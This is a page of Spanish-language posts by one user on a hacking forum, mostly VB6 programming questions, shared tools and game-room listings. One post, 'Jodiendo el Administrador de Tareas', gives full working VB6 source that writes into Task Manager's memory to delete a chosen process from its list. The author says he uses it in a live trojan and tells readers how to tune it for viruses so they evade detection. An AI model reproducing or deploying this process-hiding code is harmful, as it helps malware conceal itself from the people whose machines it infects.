elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14
121  Programación / Programación Visual Basic / [Solucionado] Alguna Alternativa de hWnd para del Timer (1 Modulo SIN FORM) en: 9 Febrero 2009, 07:41 am
Bueno la pregunta es como generar un timer pero en un modulo o modulo de clase ojo en base a apis pero SIN el hwnd de un formulario es decir solo tengo el modulo y nada mas nada extra solo un modulo con funciones y un timer hecho en API pero no funciona de hecho intente tomar el hwnd de otro lado como el escritorio y nada xP

en si el codigo del Timer API es este :

Código
  1. Public Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
  2. Public Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
  3.  
  4. sub main()
  5.    SetTimer V.hwnd, 0, 2000, AddressOf TimerProc
  6. end sub
  7.  
  8. Public Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
  9.    'Procesos
  10. End Sub
  11.  

Bueno en si como le hago para generar un hwnd pero sin tomarlo de un formulario esa es mi gran dudo creo que si se puede pero como  ¬¬"

a y como cancelar el termino de mi proceso es decir que siga corriendo o en espera pero con el timer activo xP son solo dos dudas que traigo ensima en mi segunda duda puse un

Código
  1. sub main()
  2.    SetTimer V.hwnd, 0, 2000, AddressOf TimerProc
  3.    do
  4.        doEvents
  5.    loop
  6. end sub
  7.  

Pero gasta el procesador como demonio ¬¬" bueno alguien tiene algunas pistas o soluciones por hay xD gracias de antemano

Dulces Lunas.
122  Programación / Programación Visual Basic / MCICommandString - DLL InfraMedia en: 25 Diciembre 2008, 01:05 am
Esta es una libreria donde pongo funciones de MCI para poder manejar según los codec's instalados en la pc:
Música
Imagenes
Videos

Dichos codigos no son la gran cosa ya que cualquiera los podria crear con solo leer la MSDN, solo son funciones que sustituyen a dichos comandos MCI (abajo muestro unos 3er post secuencial.)

Usa la Api mciSendString y mciGetErrorString

Funciones que incluye la DLL:

hay funciones que piden
:::WindowsStyle::: lo tipos son:
popup
child
(creo que hay otro mmm igual pueden buscar mas info sobre MCI y asi encuentran el otro xP)

Código:
AbrirComoVentana
AbrirMedia
AcercaDe
Audio_Derecho_OFF
Audio_Derecho_ON
Audio_EstableceLeftVolume
Audio_EstableceRightVolume
Audio_EstableceVolumenGeneral
Audio_EstadoDelAudio
Audio_Izquierdo_OFF
Audio_Izquierdo_ON
Audio_ObtenerLeftVolume
Audio_ObtenerRightVolume
Audio_ObtenerVolumenGeneral
Audio_OFF
Audio_ON
CerrarMedios
ChecarError
Device_Listo
Device_Nombre
Device_Version
Disquera_Abrir
Disquera_Cerrar
Establece_PocicionEn
Establece_TamanoLocal
Establece_Velocidad
Estraer_TamanoPred
MedioX_AdelantarCuadros
MedioX_AdelantarMilisegundos
MedioX_AdelantarSegundos
MedioX_AtrasarCuadros
MedioX_CerrarMedia
MedioX_DetenerMedio
MedioX_FormatoTiempo
MedioX_FormatoTiempoFaltante
MedioX_FormatoTiempoPosicion
MedioX_MinimizarMedio
MedioX_MostrarMedio
MedioX_Obtener_CuadrosPorSegundo
MedioX_Obtener_TamanoActual
MedioX_Obtener_TamanoOriginal
MedioX_Obtener_Velocidad
MedioX_Obtener_VelocidadNominalEnCuadros
MedioX_OcultarMedio
MedioX_PausarMedio
MedioX_PosicionEnMilisegundos
MedioX_ReiniciarMedio
MedioX_ReproduceFullScreen
MedioX_Reproduciendo
MedioX_ReproducirMedia
MedioX_RestaurarMedio
MedioX_ResumirMedio
MedioX_TiempoFaltanteEnCuadros
MedioX_TiempoFaltanteEnMilisegundos
MedioX_TiempoFaltanteEnSegundos
MedioX_Video_Estado
MedioX_VideoOff
MedioX_VideoOff_ALL
MedioX_VideoOn
MedioX_VideoOn_ALL
Obtener_BitsPorPicel
Obtener_EntradaDelMedio
Obtener_EstadoDelMedio
Obtener_PosicionEnCuadros
Obtener_PosicionEnSegundos
Obtener_SalidaDelMedio
Restaurar_TamanoOriginal
stepCuadros
UrlMedia_Establece

Como ven esta muy completa esta libreria pero aun me faltan opciones a como yo lo veo.

Descargar En RAR
Descargar En Zip


Comentarios? gracias

Saludos
123  Programación / Programación Visual Basic / [Source] Convertir de Medidas by BlackZeroX en: 22 Diciembre 2008, 23:10 pm
Tiene aprox hace 2 años que lo hice y desde entonces no le e realizado ningun cambio (Sabiendo que solo tiene errores de interface si lo prueban verán el dilema xP)

Las Medidas estan tomadas tal cual son,... Es decir son las mas esactas que pueden existir xP.

Aca les dejo unas pantallas: (Mas abajo esta el Source)








Con un clic en el icono de que se encuentra a un lado del relog se minimisa o se muestra xP

Al ejecutar la aplicación y poder cambiar de una unidad a otra den doble click en la unidad (donde sale cm por Default) ya sea la primera o la segunda de igual forma se puede cambiar la descripción dandole doble click a la etiqueta(es la que dice Descripcion 1,2,3 etc)

El boton verdeque se dezplada o aparece hasta la derecha de la pantalla donde esta el ScrollBar se usa para agregar otra fila para convercion tomando la el resultado de la conversion anterior y poniendolo ahora en el 1er campo para poder convertirlo ammm ejor jueguen el programa asi entienden mejor xP

El boton Rojo borra y pone todos los datos de la fila actual en blanco


Descargar

Dejen sus Comentarios xP gracias

Nota: si hacen alguna modificación avisen gracias.

Saludos.
124  Programación / Programación Visual Basic / Reproductor InfraMediaPlayer en: 21 Diciembre 2008, 20:04 pm
Bueno este es un reproductor que realice desde hace ya tiempo (por falta de tiempo no le modifico mucho), mejora al anterior en varios aspectos, usa completamente la api MCISendString para la reproduccion de archivos (Imagenes, Musica, Videos, a según el codec instalado, y las extensiones que deseen reproducir siempre y cuando se encuentren en estos 3 tipos de archivos y esten de alta en el programa para poder reproducirlos.)

ANTES que nada BORREN LA CARPETA DATA si esta jem o simplemente hagan una importacion Rapida abajito digo como hacerla xP

PUBLICARE EL SOURCE cuando termine la version 1.0.0 jo ando apenas en la 0.1.0 jo


NO USA Dependencias para reproducir (Reproduce Musica, Video e Imagenes xP)

--- Para registrar una extensión de algún tipo de archivo ---

Menú Reproducir --> Administrar extensiones

Para agregar una extensión hubiquense en el campo de texto que se encuentra por debajo de la lista o tipo de archivo solo escriban la extensión SIN el punto y opriman enter

Para borrar una extensión accedan a esta parte y denle click secundario 2 veces continuas a la extensión deseada y acepten los mensajes.

Al registrar estas extensiones indican que se podrán reproducir, y en una importacion de archivos se tomaran en cuenta las extensiones xD

Incluye opcion de arrastre de archivo a las listas (tanto de organisacion de musica, imagenes, videos como a la lista de reproducción).

Incluye una opcion de aceleración del medio musical (Le esta fallando algo, en la siguiente version lo arreglare xP)

Menus Translucidos (Afectan absolutamente a todos los menus xS)

Automaticamente pone en el MSN lo que se escucha (jeje un error no tiene la opcion de permitir o denegar rayos ¬¬)

Con Botones Aqua









Descargar
125  Programación / Programación Visual Basic / [Source] Visor Hexadecimal <-- Me ayudo a comprender cosas en vb6 en: 1 Octubre 2008, 03:59 am
Bueno este es un Soruce de un codigo fuente apa aquellos que deceen ver el Hexadecimal un X archivo

NO CARGA ARCHIVOS Mayores alrededor de  200kb's  jajaja

Codigo Fuente Visor Hexadecimal <Descargar>

Con una simple modificacion en donde se obtiene el contenido del archivo, especificarle  desle desde que Byte abrirlo y ya les soportara a abrir archivos de kb megas gigas o TB (si es que hay  ¬¬ ja) aun que en realidad cargarian un Sector (Pedazo) por asi desirlo de ese archivo en una variable quedando algo asi como en este Visor Hexadecimal creado al 100% poor un servidor (sin tomar codigo del que pongo y me sivio para entender el funcionamento del Hexadecimal en vb6)

P.D.: indicarle tambien el byte en donde se cerrara

SemiEjemplo:

Código
  1.    Open fname For Binary As #fnum
  2.        num_bytes = LOF(fnum)
  3.            ReDim bytes(wed To wsd)
  4.        Get #fnum, wed, bytes
  5.    Close fnum
  6.  

Un Visor Byte-Hexadecimal-Ascii de archivos en VB6 como ejemplo (Cuando encuentre el codigo fuente en mi PC lo posteo aca ok)

<Descargar>

<Como abrir Otro Archivo en el Programa?¿>  http://infra.110mb.com/VB/Visor_Hexadecimal/temp_visorHex.GIF



Un Saludo
126  Programación / Programación Visual Basic / OpenGL o DirectX en: 14 Septiembre 2008, 03:54 am
alguien sabe de los datos de algun libro de OpenGl? o tutorial de este aplicado en VB6   (se que practicamente no hay pero si acaso alguien se sabe alguno xD).

De DirectX pss se que me lo puedo descargar de la web de Mocosoft perdor Microsoft

lo que deseo es ya aprender graficos mas que nada ya que deseo aprender a realzar videojuegos para PC y en un futuro  para VideoConsolas (se a lo que me meto ok xP)

Por si acaso lo de los video-juegos en Visual Basic6 me crean que no se pueden entonces vean estos que hizo un chico de peru para su TESIS (segun yo se)

http://youtube.com/watch?v=tfC0LzzkXMU
http://youtube.com/watch?v=VZEa1Cqi4Uw
http://youtube.com/watch?v=pKPlKSyaa34
http://youtube.com/watch?v=-6-kdfrHfQs

P.D. Si hay ejemplos concretos en areas seria mejor a que me dieran enlaces a juegos 3d o 2d complejos  (para ustedes no pero a alguien que no sabe sobre esto aun  si xP),... de igual forma los tutos  web o descargables o un libro  (que se publique en México si acaso)
127  Programación / Programación Visual Basic / Duda con Manejo de Plugins en: 8 Agosto 2008, 18:28 pm
bueno esta es mi gran duda:

cuando se manejan plugins o bueno la carga de librerias en vb6 afuerzas deberian estar dentro de una carpeta llamada plugins ¬¬?

Antiguo Post de manejo de plugins en VB6

bueno aca reduje el codigo a practicamente nada:

bueno aca esta Simplificado ¬¬

Código
  1.    Set plug = CreateObject("miplugin.plugin")
  2.    plug.AbrirPlugin Me
  3.  

la parte del codigo original del ejemplo:

Código
  1. Public Sub CargarPlugins()
  2. 'On Error GoTo error:
  3. Dim dll$, temp$, obj
  4. Dim i As Integer
  5. Subfolders (App.path & "\plugins\") '<-------- si la cambio me salen errores y ademas no carga las dll como plugins ¬¬
  6.  For i = 0 To a - 1
  7.         dll = NplugIns(i)
  8.         MsgBox dll
  9.         dll = Left(dll, Len(dll) - 4) 'quita ".dll" del nombre
  10.        temp = dll & "." & "plugin"
  11.        Set obj = CreateObject(temp) 'se crea el plugin
  12.        Call Agregar(ListaDePlugins, temp, obj.NombrePlugin)
  13.         DoEvents
  14.   Next i
  15. ListaDePlugins(0).Visible = False 'Desaparecemos el primer elemento
  16. Exit Sub
  17. error:
  18.    'MsgBox "Error al cargar un plugin. Puede que no esté corretamente registrado.", , "Error"
  19. End Sub
  20.  

---------------------------------

Y se supone que en ese ejemplo se cargan los plugins de la carpeta indicada (en este caso "directorioActual/plugins") bueno yo la cambio (por ejemplo a "D:\data\plugins" siendo que mi exe este en "D:\") y nada de nada ¬¬ afuerzas solo me agarran con la carpeta "plugins" y q esta este en el directorio de mi compilado.

mis interrogantes son:

¿?Se puede cambiar dicha carpeta¿?
¿?Si es asi como¿?

gracias de antemano.
128  Programación / Programación Visual Basic / [CallByName] Interesante [No todos nos lo sabemos creo >:D] en: 6 Agosto 2008, 04:51 am
La pongo por que no todos nos la podriamos saber ¬¬!.

Bueno esto lo acabo de entrontrar ojala y les sirva de algo en un futuro. ( Yo solo conocia la funcion Call no esta ja  :o)

Poner en un formulario o donde deseen.

3 Textbox llamados
Código:
Text1
Text2
Text3
mas un Commanbutton llamado Command1

Código
  1. Public Function Divide(arg1 As Long, arg2 As Long)
  2.    Divide = arg1 / arg2
  3. End Function
  4. Public Function Multiplica(arg1 As Long, arg2 As Long)
  5.    Multiplica = arg1 * arg2
  6. End Function
  7. Private Sub Command1_Click()
  8.    MsgBox CallByName(Me, Text1.Text, VbMethod, Text2.Text, Text3.Text)
  9. End Sub
  10.  

 ;D ;D ;D ;D  Escribir en el text1  el nombre de la Funcion y clickear en el boton  ;D ;D ;D ;D ;D ;D
129  Programación / Programación Visual Basic / [Source-Actualisado] Jodiendo el Administrador de Tareas... en: 5 Agosto 2008, 07:33 am
Este codigo lo ocupo en un troyano que tengo Online actualmente. aca el codigo

Se agradese a quien lo aya hecho ja ;D ;D ;D

Lo que hace este codigo es secillo y es:

Código:
Localisar primero el Administrador de tareas
Enlistar todo y cada uno de sus controles ' Asi lo entendi yo ok
localisar la lista de los procesos y despues quitar el proceso indicado... en este caso el notepad.exe

Actualisado....

En un Formulario comun poner solo esto y nada Mas...
Código
  1. Private WithEvents Timer1 As Timer
  2. Private Sub Form_Load()
  3.    MsgBox "Ejecuta el Administrador de Tareas... [ Control + Alt + Supr ]"
  4.    Shell "c:\windows\system32\notepad.exe", vbNormalFocus
  5.    Set Timer1 = Me.Controls.Add("vb.timer", "Timer")
  6.    Timer1.Interval = 1000
  7.    Timer1.Enabled = True
  8. End Sub
  9. Private Sub Timer1_Timer()
  10.    Dim hWnd1 As Long
  11.    hWnd1 = FindWindow(vbNullString, "Administrador de tareas de Windows")
  12.    HandleW = hWnd1
  13.    If (hWnd1 <= 0) Then
  14.        Caption = "No se ha encontrado el administrador de tareas"
  15.    Else
  16.        Caption = "Se ha encontrado el administrador de tareas"
  17.        EnumChildWindows hWnd1, AddressOf Procesitos, 1 'lParam
  18.    End If
  19. End Sub
  20.  


En un Modulo poner esto otro...
Código
  1. Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  2. Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
  3. Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
  4. Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
  5. Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
  6.  
  7.  
  8. Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
  9. Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
  10. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
  11. Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
  12.  
  13. Const PROCESS_VM_OPERATION = &H8
  14. Const PROCESS_VM_READ = &H10
  15. Const PROCESS_VM_WRITE = &H20
  16. Const PROCESS_ALL_ACCESS = 0
  17. Private Const PAGE_READWRITE = &H4&
  18.  
  19. Const MEM_COMMIT = &H1000
  20. Const MEM_RESERVE = &H2000
  21. Const MEM_DECOMMIT = &H4000
  22. Const MEM_RELEASE = &H8000
  23. Const MEM_FREE = &H10000
  24. Const MEM_PRIVATE = &H20000
  25. Const MEM_MAPPED = &H40000
  26. Const MEM_TOP_DOWN = &H100000
  27.  
  28. Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
  29. Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
  30. Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
  31.  
  32. Private ASDQWEZXC As String
  33.  
  34. Private Const LVM_FIRST = &H1000
  35. Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)
  36.  
  37. Private Const LVM_GETITEMW = (LVM_FIRST + 75)
  38. Private Const LVIF_TEXT = &H1
  39. Private Const LVM_DELETEITEM = 4104
  40.  
  41. Public Type LV_ITEM
  42.    mask As Long
  43.    iItem As Long
  44.    iSubItem As Long
  45.    state As Long
  46.    stateMask As Long
  47.    lpszText As Long 'LPCSTR
  48.    cchTextMax As Long
  49.    iImage As Long
  50.    lParam As Long
  51.    iIndent As Long
  52. End Type
  53.  
  54. Type LV_TEXT
  55.    sItemText As String * 80
  56. End Type
  57.  
  58. Public Function Procesitos(ByVal hWnd2 As Long, lParam As String) As Boolean
  59. Dim Nombre As String * 255, nombreClase As String * 255
  60. Dim Nombre2 As String, nombreClase2 As String
  61. Dim X As Long, Y As Long
  62. X = GetWindowText(hWnd2, Nombre, 255)
  63. Y = GetClassName(hWnd2, nombreClase, 255)
  64.  
  65. Nombre = Left(Nombre, X)
  66. nombreClase = Left(nombreClase, Y)
  67. Nombre2 = Trim(Nombre)
  68. nombreClase2 = Trim(nombreClase)
  69. If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
  70.   JodeLosItems (hWnd2)
  71.   Exit Function
  72. End If
  73. If Nombre2 = "" And nombreClase2 = "" Then
  74. Procesitos = False
  75. Else
  76. Procesitos = True
  77. End If
  78. End Function
  79.  
  80. Public Function JodeLosItems(ByVal hListView As Long) ' As Variant
  81.   Dim pid As Long, tid As Long
  82.   Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
  83.   Dim DirMemComp As Long, dwTam As Long
  84.   Dim DirMemComp2 As Long
  85.   Dim sLVItems() As String
  86.   Dim li As LV_ITEM
  87.   Dim lt As LV_TEXT
  88.   If hListView = 0 Then Exit Function
  89.   tid = GetWindowThreadProcessId(hListView, pid)
  90.   nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
  91.   If nElem = 0 Then Exit Function
  92.   ReDim sLVItems(nElem - 1)
  93.   li.cchTextMax = 80
  94.   dwTam = Len(li)
  95.      DirMemComp = DameMemComp(pid, dwTam, hProceso)
  96.      DirMemComp2 = DameMemComp(pid, LenB(lt), hProceso)
  97.      For i = 0 To nElem - 1
  98.          li.lpszText = DirMemComp2
  99.          li.cchTextMax = 80
  100.          li.iItem = i
  101.          li.mask = LVIF_TEXT
  102.          WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
  103.          lt.sItemText = Space(80)
  104.          WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
  105.          Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
  106.          Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
  107.          '''ASDQWEZXC = TrimNull(StrConv(lt.sItemText, vbFromUnicode))
  108.          '''Form1.Text1.Text = Form1.Text1.Text & vbCrLf & TrimNull(StrConv(lt.sItemText, vbFromUnicode))
  109.          '''If Len(Form1.Text1.Text) >= 10000 Then Form1.Text1.Text = ""
  110.  
  111.          If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = "notepad.exe" Then '<===========CAMBIAR
  112.           Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
  113.           '''Form1.Text2 = i
  114.           Exit Function
  115.          End If
  116.      Next i
  117.      AdiosMemComp hProceso, DirMemComp, dwTam
  118.      AdiosMemComp hProceso, DirMemComp2, LenB(lt)
  119. End Function
  120.  
  121. Public Function DameMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
  122.    hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
  123.    DameMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
  124. End Function
  125.  
  126. Public Sub AdiosMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
  127.   Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
  128.   CloseHandle hProceso
  129. End Sub
  130. Public Function TrimNull(jaja As String) As String
  131.   Dim pos As Integer
  132.   pos = InStr(jaja, Chr$(0))
  133.   If pos Then
  134.      TrimNull = Left$(jaja, pos - 1)
  135.      Exit Function
  136.   End If
  137.   TrimNull = jaja
  138. End Function
  139.  

Se entiende cuando se ejecuta por partes y muestra los resultados en pantalla asi lo entendi todo.

a si si lo usan para algun virus o algo no se otambien cambienle la prioridad al Administrador de Tareas en el momento... o modifiquen el codigo para que el refresco del Administrador de Tareas sea subitamente lento xP y no cachen el programa atiempo JOJOJO

PD.: Se ve bien a color no jaja, a y Reafirmo se agradece aquien lo aya hecho
130  Media / Juegos y Consolas / [Aporta tus Salas Hamachi] Redes Lan Virtuales para Jugar Online en: 28 Julio 2008, 10:01 am
Bueno aportalas...

A como veo en unos foros de este tipo de secciones (juegos) hay post para salas de hamachi, si conoces otras Salas de otros juegos igual ponganlas aca las pondre en este Post.¡!

Aca les dejo unos con referencia a salas de Age Of Empires

Salas Hamachi AOE:
Desertorx
Desertorx2
Desertorx3
Desertorx4
AOE_n_
AOE_0_0
AOE_0_1
AOE_0_2
AOE_0_3
AOE_0_4
AOE_0_5
AOE_0_6
AOE_0_7
AOE_0_8
AOE_0_9

La contraseña para todas las Salas es: 123



Descargar Hamachi Descargar

Descargar Hamachi Instalar como siempre Siguiente siguiente etc etc y finalisas ejecutas el hamachi y te unes a las salas...¡!
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines